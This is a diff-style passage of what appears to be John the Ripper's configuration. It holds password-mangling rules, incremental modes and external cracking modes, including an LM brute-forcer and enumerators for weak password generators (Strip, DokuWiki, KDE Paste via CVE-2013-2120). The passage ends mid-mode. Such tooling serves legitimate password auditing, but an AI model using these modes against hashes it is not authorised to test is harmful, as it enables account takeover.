+-c (?a c Q [RL]
+:[RL] \0 Q
+# Both prefixing and suffixing...
+<- l ^[1!@#$%^&*\-=_+.?|:'"] $\1
+<- l ^[({[<] $\p[)}\]>]
+# The rest of two-digit suffix stuff, less common numbers...
+<- l Az"[63-5][0-9]"
+-c <- (?a c Az"[63-5][0-9]"
+# Some multi-digit numbers...
+-[:c] (?a \p1[lc] Az"007" <+
+-[:c] (?a \p1[lc] Az"123" <+
+-[:c] (?a \p1[lc] Az"[0-9]\0\0" <+
+-[:c] (?a \p1[lc] Az"1234" <+
+-[:c] (?a \p1[lc] Az"[0-9]\0\0\0" <+
+-[:c] (?a \p1[lc] Az"12345" <+
+-[:c] (?a \p1[lc] Az"[0-9]\0\0\0\0" <+
+-[:c] (?a \p1[lc] Az"123456" <+
+-[:c] (?a \p1[lc] Az"[0-9]\0\0\0\0\0" <+
+# Some [birth] years...
+l Az"19[7-96-0]" <+ >-
+l Az"20[01]" <+ >-
+l Az"19[7-9][0-9]" <+
+l Az"20[01][0-9]" <+
+l Az"19[6-0][9-0]" <+
+
+[List.Rules:Extra]
+# Insert/overstrike some characters...
+!?A >[1-6] l i\0[a-z]
+!?A l o0[a-z]
+!?A >[1-7] l o\0[a-z]
+# Toggle case everywhere (up to length 8), assuming that certain case
+# combinations were already tried.
+-c T1 Q M T0 Q
+-c T2 Q M T[z0] T[z1] Q
+-c T3 Q M T[z0] T[z1] T[z2] Q
+-c T4 Q M T[z0] T[z1] T[z2] T[z3] Q
+-c T5 Q M T[z0] T[z1] T[z2] T[z3] T[z4] Q
+-c T6 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] Q
+-c T7 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] T[z6] Q
+# Very slow stuff...
+l Az"[1-90][0-9][0-9]" <+
+-c (?a c Az"[1-90][0-9][0-9]" <+
+<[\-9] l A\p[z0]"[a-z][a-z]"
+<- l ^[a-z] $[a-z]
+
+# Wordlist mode rules
+[List.Rules:Wordlist]
+# Try words as they are
+:
+# Lowercase every pure alphanumeric word
+-c >3 !?X l Q
+# Capitalize every pure alphanumeric word
+-c (?a >2 !?X c Q
+# Lowercase and pluralize pure alphabetic words
+<* >2 !?A l p
+# Lowercase pure alphabetic words and append '1'
+<* >2 !?A l $1
+# Capitalize pure alphabetic words and append '1'
+-c <* >2 !?A c $1
+# Duplicate reasonably short pure alphabetic words (fred -> fredfred)
+<7 >1 al !?A l d
+# Lowercase and reverse pure alphabetic words
+>3 !?A l M r Q
+# Prefix pure alphabetic words with '1'
+>2 !?A l ^1
+# Uppercase pure alphanumeric words
+-c >2 !?X u Q M c Q u
+# Lowercase pure alphabetic words and append a digit or simple punctuation
+<* >2 !?A l $[2!37954860.?]
+# Words containing punctuation, which is then squeezed out, lowercase
+/?p @?p >3 l
+# Words with vowels removed, lowercase
+/?v @?v >3 l
+# Words containing whitespace, which is then squeezed out, lowercase
+/?w @?w >3 l
+# Capitalize and duplicate short pure alphabetic words (fred -> FredFred)
+-c <7 >1 al !?A c d
+# Capitalize and reverse pure alphabetic words (fred -> derF)
+-c <+ >2 !?A c r
+# Reverse and capitalize pure alphabetic words (fred -> Derf)
+-c >2 !?A l M r Q c
+# Lowercase and reflect pure alphabetic words (fred -> fredderf)
+<7 >1 al !?A l d M 'l f Q
+# Uppercase the last letter of pure alphabetic words (fred -> freD)
+-c <+ >2 !?A l M r Q c r
+# Prefix pure alphabetic words with '2' or '4'
+>2 !?A l ^[24]
+# Capitalize pure alphabetic words and append a digit or simple punctuation
+-c <* >2 !?A c $[2!3957468.?0]
+# Prefix pure alphabetic words with digits
+>2 !?A l ^[379568]
+# Capitalize and pluralize pure alphabetic words of reasonable length
+-c <* >2 !?A c p
+# Lowercase/capitalize pure alphabetic words of reasonable length and convert:
+# crack -> cracked, crack -> cracking
+-[:c] <* >2 !?A \p1[lc] M [PI] Q
+# Try the second half of split passwords
+-s x**
+-s-c x** M l Q
+
+# Case toggler for cracking MD4-based NTLM hashes (with the contributed patch)
+# given already cracked DES-based LM hashes.  Use --rules=NT to use this.
+[List.Rules:NT]
+:
+-c T0Q
+-c ->2 a0 T1QT[z0]
+-c ->3 a0 T2QT[z0]T[z1]
+-c ->4 a0 T3QT[z0]T[z1]T[z2]
+-c ->5 a0 T4QT[z0]T[z1]T[z2]T[z3]
+-c ->6 a0 T5QT[z0]T[z1]T[z2]T[z3]T[z4]
+-c ->7 a0 T6QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]
+-c ->8 a0 T7QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]
+-c ->9 a0 T8QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]
+-c ->A a0 T9QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]
+-c ->B a0 TAQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]
+-c ->C a0 TBQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]T[zA]
+-c ->D a0 TCQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]T[zA]T[zB]
+-c ->E a0 TDQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]T[zA]T[zB]T[zC]
+
+# Shift toggler, up to length 16
+[List.Rules:ShiftToggle]
+:
+W0Q
+->2 a0 W1QW[z0]
+->3 a0 W2QW[z0]W[z1]
+->4 a0 W3QW[z0]W[z1]W[z2]
+->5 a0 W4QW[z0]W[z1]W[z2]W[z3]
+->6 a0 W5QW[z0]W[z1]W[z2]W[z3]W[z4]
+->7 a0 W6QW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]
+->8 a0 W7QW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]
+->9 a0 W8QW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]
+->A a0 W9QW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]
+->B a0 WAQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]
+->C a0 WBQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]
+->D a0 WCQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]W[zB]
+->E a0 WDQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]W[zB]W[zC]
+->F a0 WEQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]W[zB]W[zC]W[zD]
+->G a0 WFQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]W[zB]W[zC]W[zD]W[zE]
+
+# Used for loopback. This rule will produce candidates "PASSWOR" and "D" for
+# an input of "PASSWORD" (assuming LM, which has halves of length 7).
+[List.Rules:Split]
+:
+-s x**
+
+# Some Office <=2003 files have passwords truncated at 15
+[List.Rules:OldOffice]
+:
+->F -<F >F 'F
+
+# Rules from Hash Runner 2014
+[List.Rules:o1]
+# o[0-9A-Z][ -~]
+->\r[1-9A-ZZ] >\p[0-9A-Z] o\0[ -~] Q
+
+[List.Rules:o2]
+# o[0-9A-E][ -~] Q M o[0-9A-E][ -~] Q
+->[1-9A-F] ->[1-9A-F] >\p1[0-9A-E] >\p2[0-9A-E] o\3[ -~] Q M o\4[ -~] Q
+
+[List.Rules:o3]
+# o[0-9][ -~] Q M o[0-9][ -~] Q M o[0-9][ -~] Q
+->[1-9A] ->[1-9A] ->[1-9A] >\p1[0-9] >\p2[0-9] >\p3[0-9] o\4[ -~] Q M o\5[ -~] Q M o\6[ -~] Q
+
+[List.Rules:o]
+.include [List.Rules:o1]
+.include [List.Rules:o2]
+
+[List.Rules:i1]
+# i[0-9A-Z][ -~]
+->\r[2-9A-ZZZ] >\p1[0-9A-Z] i\0[ -~]
+
+[List.Rules:i2]
+# i[0-9A-E][ -~] i[0-9A-E][ -~]
+->[2-9A-G] ->[2-9A-G] >\p1[0-9A-E] >\p2[0-9A-E] i\3[ -~] i\4[ -~]
+
+[List.Rules:i3]
+# i[0-9][ -~] i[0-9][ -~] i[0-9][ -~]
+->[4-9A-D] ->[4-9A-D] ->[4-9A-D] >\p1[0-9] >\p2[0-9] >\p3[0-9] i\4[ -~] i\5[ -~] i\6[ -~]
+
+[List.Rules:i]
+.include [List.Rules:i1]
+.include [List.Rules:i2]
+
+[List.Rules:oi]
+.include [List.Rules:o1]
+.include [List.Rules:i1]
+.include [List.Rules:o2]
+.include [List.Rules:i2]
+
+[List.Rules:T9]
+a0 /?D l sa2 sb2 sc2 sd3 se3 sf3 sg4 sh4 si4 sj5 sk5 sl5 sm6 sn6 so6 sp7 sq7 sr7 ss7 st8 su8 sv8 sw9 sx9 sy9 sz9 s?D*
+a0 /?D l sa2 sb2 sc2 sd3 se3 sf3 sg4 sh4 si4 sj5 sk5 sl5 sm6 sn6 so6 sp7 sq7 sr7 ss7 st8 su8 sv8 sw9 sx9 sy9 sz9 /?D s?D#
+
+# A few rule sets from hashcat (taken as-is from https://github.com/hashcat/)
+#
+# Note that these are very poorly optimized with our measure, as they lack
+# rule-rejection flags. Also, they don't use the preprocessor so are a lot
+# harder to digest (for a human looking at them that is, for JtR there's
+# virtually no difference).
+#
+[List.Rules:best64]
+!! hashcat logic ON
+.include <rules/best64.rule>
+!! hashcat logic OFF
+
+[List.Rules:d3ad0ne]
+!! hashcat logic ON
+.include <rules/d3ad0ne.rule>
+!! hashcat logic OFF
+
+[List.Rules:dive]
+!! hashcat logic ON
+.include <rules/dive.rule>
+!! hashcat logic OFF
+
+[List.Rules:InsidePro]
+!! hashcat logic ON
+.include <rules/InsidePro-PasswordsPro.rule>
+!! hashcat logic OFF
+
+[List.Rules:T0XlC]
+!! hashcat logic ON
+.include <rules/T0XlC.rule>
+.include <rules/T0XlCv1.rule>
+.include <rules/T0XlC-insert_top_100_passwords_1_G.rule>
+!! hashcat logic OFF
+
+[List.Rules:rockyou-30000]
+!! hashcat logic ON
+.include <rules/rockyou-30000.rule>
+!! hashcat logic OFF
+
+[List.Rules:specific]
+!! hashcat logic ON
+.include <rules/specific.rule>
+!! hashcat logic OFF
+
+[List.Rules:hashcat]
+.include [List.Rules:best64]
+.include [List.Rules:d3ad0ne]
+.include [List.Rules:dive]
+.include [List.Rules:InsidePro]
+.include [List.Rules:T0XlC]
+.include [List.Rules:rockyou-30000]
+.include [List.Rules:specific]
+
+# These are for phrase wordlists w/ spaces
+[List.Rules:passphrase-rule1]
+.include <rules/passphrase-rule1.rule>
+
+[List.Rules:passphrase-rule2]
+.include <rules/passphrase-rule2.rule>
+
+# Default Loopback mode rules.
+[List.Rules:Loopback]
+.include [List.Rules:ShiftToggle]
+.include [List.Rules:Split]
+!! hashcat logic ON
+m
+-m
+!! hashcat logic OFF
+b1 ]
+
+# For Single Mode against fast hashes
+[List.Rules:Single-Extra]
+.include [List.Rules:Single]
+.include [List.Rules:Extra]
+.include [List.Rules:OldOffice]
+
+# For Wordlist mode and very fast hashes
+[List.Rules:Jumbo]
+.include [List.Rules:Single-Extra]
+.include [List.Rules:Wordlist]
+.include [List.Rules:ShiftToggle]
+.include [List.Rules:best64]
+
+# KoreLogic rules
+.include <korelogic.conf>
+
+# Everything, including all KoreLogic and the rest of included hashcat rules.
+# Only for very fast hashes and/or Single mode. Some of these rules are of
+# ridiculous quality and lack optimizations - you have been warned.
+[List.Rules:All]
+.include [List.Rules:Jumbo]
+.include [List.Rules:KoreLogic]
+.include [List.Rules:T9]
+.include [List.Rules:hashcat]
+
+# Incremental modes
+
+# This is for one-off uses (make your own custom.chr)
+[Incremental:Custom]
+File = $JOHN/custom.chr
+MinLen = 0
+
+# The theoretical CharCount is 211, we've got 196.
+[Incremental:UTF8]
+File = $JOHN/utf8.chr
+MinLen = 0
+CharCount = 196
+
+# This is CP1252, a super-set of ISO-8859-1.
+# The theoretical CharCount is 219, we've got 203.
+[Incremental:Latin1]
+File = $JOHN/latin1.chr
+MinLen = 0
+CharCount = 203
+
+[Incremental:ASCII]
+File = $JOHN/ascii.chr
+MinLen = 0
+MaxLen = 13
+CharCount = 95
+
+[Incremental:LM_ASCII]
+File = $JOHN/lm_ascii.chr
+MinLen = 0
+MaxLen = 7
+CharCount = 69
+
+# This is CP858 (CP850 + Euro sign, superset of CP437).
+# The theoretical CharCount is 209 minus lowercase, we've got 132.
+[Incremental:LanMan]
+File = $JOHN/lanman.chr
+MinLen = 0
+MaxLen = 7
+CharCount = 132
+
+# This is alnum (upper & lower case) as well as space.
+[Incremental:Alnumspace]
+File = $JOHN/alnumspace.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 63
+
+[Incremental:Alnum]
+File = $JOHN/alnum.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 62
+
+[Incremental:Alpha]
+File = $JOHN/alpha.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 52
+
+[Incremental:LowerNum]
+File = $JOHN/lowernum.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 36
+
+[Incremental:UpperNum]
+File = $JOHN/uppernum.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 36
+
+[Incremental:LowerSpace]
+File = $JOHN/lowerspace.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 27
+
+[Incremental:Lower]
+File = $JOHN/lower.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 26
+
+[Incremental:Upper]
+File = $JOHN/upper.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 26
+
+[Incremental:Digits]
+File = $JOHN/digits.chr
+MinLen = 1
+MaxLen = 20
+CharCount = 10
+
+# Some pre-defined word filters as used to generate the supplied .chr files
+[List.External:Filter_ASCII]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (c < 0x20 || c > 0x7e || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_LanMan]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i]) {
+		if (i >= 14) {			// of up to 14 characters long
+			word = 0; return;
+		}
+		if (c >= 'a' && c <= 'z')	// Convert to uppercase
+			word[i] &= 0xDF;
+		i++;
+	}
+
+	word[7] = 0;				// Truncate at 7 characters
+}
+
+[List.External:Filter_LM_ASCII]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i]) {
+		if (c < 0x20 || c > 0x7e ||	// Require ASCII-only
+		    i >= 14) {			// of up to 14 characters long
+			word = 0; return;
+		}
+		if (c >= 'a' && c <= 'z')	// Convert to uppercase
+			word[i] &= 0xDF;
+		i++;
+	}
+
+	word[7] = 0;				// Truncate at 7 characters
+}
+
+[List.External:Filter_Alnumspace]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (c != ' ' && (((c < '0' || c > '9') &&
+	((c &= 0xDF) < 'A' || c > 'Z'))) || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_Alnum]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (((c < '0' || c > '9') && ((c &= 0xDF) < 'A' || c > 'Z')) ||
+	    i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_Alpha]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if ((c &= 0xDF) < 'A' || c > 'Z' || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_LowerNum]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (((c < 'a' || c > 'z') && (c < '0' || c > '9')) || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_UpperNum]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (((c < 'A' || c > 'Z') && (c < '0' || c > '9')) || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_LowerSpace]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (((c < 'a' || c > 'z') && c != ' ') || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_Lower]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (c < 'a' || c > 'z' || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_Upper]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (c < 'A' || c > 'Z' || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_Digits]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (c < '0' || c > '9' || i > 20) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_No_Cap_or_Symbols]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if ((c < 'a' || c > 'z') && (c < '0' || c > '9')) {
+		return;
+	}
+	word = 0; return;
+}
+
+
+# Reject words that are illegal UTF-8
+# We obviously let pure ASCII through too
+[List.External:Filter_UTF8]
+void filter()
+{
+	int s, a, p;
+
+	p = 0;
+	while (s = word[p++] & 0xff) {
+		if (s > 0x7f) {
+			if (s < 0xc2 || s > 0xf7) { // illegal single-byte
+				word = 0; return;
+			}
+			// two-byte c2..df
+			a = word[p++] & 0xff;
+			if (a < 0x80 || a > 0xbf) {
+				word = 0; return;
+			}
+			if (s > 0xdf) { // three-byte e0..ef
+				if (s == 0xe0 && a < 0xa0) {
+					word = 0; return;
+				}
+				if (s == 0xed && a > 0x9f) {
+					word = 0; return;
+				}
+				if (s == 0xf0 && a < 0x90) {
+					word = 0; return;
+				}
+				if (s == 0xf4 && a > 0x8f) {
+					word = 0; return;
+				}
+				a = word[p++] & 0xff;
+				if (a < 0x80 || a > 0xbf) {
+					word = 0; return;
+				}
+				if (s > 0xef) { // four-byte f0..f7
+					a = word[p++] & 0xff;
+					if (a < 0x80 || a > 0xbf) {
+						word = 0; return;
+					}
+				}
+			}
+		}
+	}
+}
+
+# Reject words that are LEGAL UTF-8 (also rejects pure ASCII)
+[List.External:Filter_non-UTF8]
+void filter()
+{
+	int s, a, p;
+
+	p = 0;
+	while (s = word[p++] & 0xff) {
+		if (s > 0x7f) {
+			if (s < 0xc2 || s > 0xf7) { // illegal single-byte
+				return;
+			}
+			// two-byte c2..df
+			a = word[p++] & 0xff;
+			if (a < 0x80 || a > 0xbf) {
+				return;
+			}
+			if (s > 0xdf) { // three-byte e0..ef
+				if (s == 0xe0 && a < 0xa0) {
+					return;
+				}
+				if (s == 0xed && a > 0x9f) {
+					return;
+				}
+				if (s == 0xf0 && a < 0x90) {
+					return;
+				}
+				if (s == 0xf4 && a > 0x8f) {
+					return;
+				}
+				a = word[p++] & 0xff;
+				if (a < 0x80 || a > 0xbf) {
+					return;
+				}
+				if (s > 0xef) { // four-byte f0..f7
+					a = word[p++] & 0xff;
+					if (a < 0x80 || a > 0xbf) {
+						return;
+					}
+				}
+			}
+		}
+	}
+	word = 0;
+}
+
+# A simple cracker for LM hashes
+[List.External:LanMan]
+int length;				// Current length
+int maxlength;
+
+void init()
+{
+	if (req_minlen)
+		length = req_minlen;
+	else
+		length = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else					// the format's limit
+		maxlength = cipher_limit;
+	word[0] = 'A' - 1;		// Start with "A"
+	word[length] = 0;
+}
+
+void generate()
+{
+	int i;
+
+	i = length - 1;			// Start from the last character
+	while (++word[i] > 'Z')		// Try to increase it
+	if (i)				// Overflow here, any more positions?
+		word[i--] = 'A';	// Yes, move to the left, and repeat
+	else				// No
+
+	if (length < maxlength) {
+		word[i = ++length] = 0;	// Switch to the next length
+		while (i--)
+			word[i] = 'A';
+		return;
+	} else {
+		word = 0; return;	// We're done
+	}
+}
+
+void restore()
+{
+	length = 0;			// Calculate the length
+	while (word[length]) length++;
+}
+
+# Simple and well-commented, yet useful external mode example
+# NOTE, this has now been 'split' up into a base extern, 'base', and then
+# multiple External:double functions.  It still has same code as original
+# double, but now can be easily expanded.
+[List.External_base:Double]
+/*
+ * This cracking mode tries all the possible duplicated lowercase alphabetic
+ * "words" of up to 8 characters long.  Since word halves are the same, it
+ * only has to try about 500,000 words.
+ */
+
+/* Global variables: current length and word */
+/* make this 'long' enough for other externs that include this one */
+/* (up to 125 bytes long) */
+
+int length, current[126], max;
+
+/* this new 'type' variable, is used to tell double what character set to
+ * use. It can use the original (alpha).  If type is 0 (i.e. unset), then
+ * a-z (alpha) character set is used.  If type is '0' (a zero ascii byte)
+ * then alnum charset is used, a-z0-9.  If type is a space char, then all
+ * charset is used  [space - tilde]  or [ -~].  This required setting the
+ * type var in the init() of alnum or all doubles (it can be left unset
+ * in the alpha versions).  It also requires some if logic in generate.
+ * other than that, it works the same, with almost no performance hit */
+int type;
+
+/* Generates a new word */
+void generate()
+{
+	int i;
+
+/* Export last generated word, duplicating it at the same time; here "word"
+ * is a pre-defined external variable. */
+	word[(i = length) << 1] = 0;
+	while (i--) word[length + i] = word[i] = current[i];
+
+/* Generate a new word */
+	i = length - 1;			// Start from the last character
+	if (type == 0) {
+		/* alpha */
+		while (++current[i] > 'z')	// Try to increase it
+		if (i)				// Overflow here, any more positions?
+			current[i--] = 'a';	// Yes, move to the left, and repeat
+		else {				// No
+			current = 0;		// Request a length switch
+			break;			// Break out of the loop
+		}
+	} else if (type == '0') {
+		/* alnum */
+		if (current[i] == 'z') current[i] = '0'-1;
+		while (++current[i] == '9')	{ // Try to increase it
+			if (i)				// Overflow here, any more positions?
+				current[i--] = 'a';	// Yes, move to the left, and repeat
+			else {				// No
+				current = 0;		// Request a length switch
+				break;			// Break out of the loop
+			}
+			if (current[i] == 'z') current[i] = '0'-1;
+		}
+	} else if (type == ' ') {
+		/* all */
+		while (++current[i] > '~')	{ // Try to increase it
+			if (i)				// Overflow here, any more positions?
+				current[i--] = ' ';	// Yes, move to the left, and repeat
+			else {				// No
+				current = 0;		// Request a length switch
+				break;			// Break out of the loop
+			}
+		}
+	}
+	/* else ????? wtf?? */
+
+/* Switch to the next length, unless we were generating 8 character long
+ * words already. */
+	if (!current && length < max) {
+		i = ++length;
+		if (type == 0 || type == '0')
+			while (i--) current[i] = 'a';
+		else if (type == ' ')
+			while (i--) current[i] = ' ';
+	}
+}
+
+/* Called when restoring an interrupted session */
+void restore()
+{
+	int i;
+
+/* Import the word back */
+	i = 0;
+	while (current[i] = word[i]) i++;
+
+/* ...and calculate the half-word length */
+	length = i >> 1;
+}
+
+[List.External:Double]
+.include [List.External_base:Double]
+
+/* Called at startup to initialize the global variables */
+void init()
+{
+	int i;
+
+	if (req_minlen)
+		i = length = (req_minlen + 1) / 2;
+	else
+		i = length = 2;		// Start with 4 character long words
+	while (i--) current[i] = 'a';	// Set our half-word to "aa"
+	if (req_maxlen)
+		max = (req_maxlen + 1) / 2;
+	else if (length > 4)
+		max = length;
+	else
+		max = 4;
+}
+
+[List.External:Double_alnum]
+.include [List.External_base:Double]
+
+/* Called at startup to initialize the global variables */
+void init()
+{
+	int i;
+
+	if (req_minlen)
+		i = length = (req_minlen + 1) / 2;
+	else
+		i = length = 2;		// Start with 4 character long words
+	while (i--) current[i] = 'a';	// Set our half-word to "aa"
+	if (req_maxlen)
+		max = (req_maxlen + 1) / 2;
+	else if (length > 4)
+		max = length;
+	else
+		max = 4;
+
+	type = '0';
+}
+
+[List.External:Double_all]
+.include [List.External_base:Double]
+void init()
+{
+	int i;
+
+	if (req_minlen)
+		i = length = (req_minlen + 1) / 2;
+	else
+		i = length = 2;		// Start with 4 character long words
+	while (i--) current[i] = ' ';	// Set our half-word to "  "
+	if (req_maxlen)
+		max = (req_maxlen + 1) / 2;
+	else if (length > 4)
+		max = length;
+	else
+		max = 4;
+
+	type = ' ';
+}
+
+
+# Strip 0.5 ("Secure Tool for Recalling Important Passwords") cracker,
+# based on analysis done by Thomas Roessler and Ian Goldberg.  This will
+# crack passwords you may have generated with Strip; other uses of Strip
+# are unaffected.
+[List.External:Strip]
+int minlength, maxlength, mintype, maxtype;
+int crack_seed, length, type;
+int count, charset[128];
+
+void init()
+{
+	int c;
+
+/* Password lengths to try; Strip can generate passwords of 4 to 16
+ * characters, but traditional crypt(3) hashes are limited to 8. */
+	minlength = req_minlen;
+	if (minlength < 4)
+		minlength = 4;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else					// the format's limit
+		maxlength = cipher_limit;
+	if (maxlength >16) maxlength = 16;
+
+/* Password types to try (Numeric, Alpha-Num, Alpha-Num w/ Meta). */
+	mintype = 0;	// 0
+	maxtype = 2;	// 2
+
+	crack_seed = 0x10000;
+	length = minlength - 1;
+	type = mintype;
+
+	count = 0;
+	c = '0'; while (c <= '9') charset[count++] = c++;
+}
+
+void generate()
+{
+	int seed, random;
+	int i, c;
+
+	if (crack_seed > 0xffff) {
+		crack_seed = 0;
+
+		if (++length > maxlength) {
+			length = minlength;
+
+			if (++type > maxtype) {
+				word[0] = 0;
+				return;
+			}
+		}
+
+		count = 10;
+		if (type >= 1) {
+			c = 'a'; while (c <= 'f') charset[count++] = c++;
+			c = 'h'; while (c <= 'z') charset[count++] = c++;
+			c = 'A'; while (c <= 'Z') charset[count++] = c++;
+		}
+		if (type == 2) {
+			charset[count++] = '!';
+			c = '#'; while (c <= '&') charset[count++] = c++;
+			c = '('; while (c <= '/') charset[count++] = c++;
+			c = '<'; while (c <= '>') charset[count++] = c++;
+			charset[count++] = '?'; charset[count++] = '@';
+			charset[count++] = '['; charset[count++] = ']';
+			charset[count++] = '^'; charset[count++] = '_';
+			c = '{'; while (c <= '~') charset[count++] = c++;
+		}
+	}
+
+	seed = (crack_seed++ << 16 >> 16) * 22695477 + 1;
+
+	i = 0;
+	while (i < length) {
+		random = ((seed = seed * 22695477 + 1) >> 16) & 0x7fff;
+		word[i++] = charset[random % count];
+	}
+
+	word[i] = 0;
+}
+
+# A variation of KnownForce configured to try all the 385641000 possible
+# auto-generated passwords of DokuWiki versions up to at least 2013-05-10.
+[List.External:DokuWiki]
+int last;		// Last character position, zero-based
+int lastofs;		// Last character position offset into charset[]
+int lastid;		// Current character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int charset[0x7f00];	// Character sets, 0x100 elements for each position
+
+void init()
+{
+	int A[26], C[26], V[26];
+	int length;
+	int pos, ofs, i, c;
+
+	i = 0; while (i < 26) { A[i] = C[i] = 1; V[i++] = 0; }
+	i = 'a' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'e' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'i' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'o' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'u' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'q' - 'a'; A[i] = C[i] = 0;
+	i = 'x' - 'a'; A[i] = C[i] = 0;
+	i = 'y' - 'a'; A[i] = C[i] = 0;
+
+	length = 8;
+
+/* This defines the character sets for different character positions */
+	pos = 0;
+	while (pos < 6) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = 'a' - 1;
+		while (++c <= 'z')
+			if (C[c - 'a'])
+				charset[ofs + i++] = c;
+		charset[ofs + i] = 0;
+		ofs = pos++ << 8;
+		i = 0;
+		c = 'a' - 1;
+		while (++c <= 'z')
+			if (V[c - 'a'])
+				charset[ofs + i++] = c;
+		charset[ofs + i] = 0;
+		ofs = pos++ << 8;
+		i = 0;
+		c = 'a' - 1;
+		while (++c <= 'z')
+			if (A[c - 'a'])
+				charset[ofs + i++] = c;
+		charset[ofs + i] = 0;
+	}
+	c = '1';
+	while (pos < length) {
+		ofs = pos++ << 8;
+		i = 0;
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+		c = '0';
+	}
+
+	last = length - 1;
+	pos = -1;
+	while (++pos <= last)
+		word[pos] = charset[id[pos] = pos << 8];
+	lastid = (lastofs = last << 8) - 1;
+	word[pos] = 0;
+}
+
+void generate()
+{
+	int pos;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	word[pos = last] = charset[lastid = lastofs];
+	while (pos--) {			// Have a preceding position?
+		if (word[pos] = charset[++id[pos]]) return;
+		word[pos] = charset[id[pos] = pos << 8];
+	}
+
+	word = 0;			// We're done
+}
+
+void restore()
+{
+	int i, c;
+
+/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = lastofs = last << 8;
+		while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = lastofs; // Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
+
+/*
+ * This takes advantage of CVE-2013-2120 to find seeds that KDE Paste applet
+ * uses to generate passwords.
+ *
+ * This software is Copyright (c) Michael Samuel <mik@miknet.net>,
+ * and it is hereby released to the general public under the following terms:
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted.
+ */
+[List.External:KDEPaste]
+int charset[95];
+int charset_length, password_length, endTime, startTime, msec;
+
+void init()
+{
+	password_length = 8;	/* Change this to match config */
+	endTime = session_start_time;
+	startTime = 1343743200;	/* Aug 1 2012  - Change this as necessary */
+
+	msec = 1;		/* msec is never 0 - it would crash the applet */
+
+	charset_length = 0;
+	int c;
+
+	/* Comment out classes that you don't need, but keep the order the same */
+	/* Lowers */
+	c = 'a'; while (c <= 'z') charset[charset_length++] = c++;
+
+	/* Uppers */
+	c = 'A'; while (c <= 'Z') charset[charset_length++] = c++;
+
+	/* Numbers */
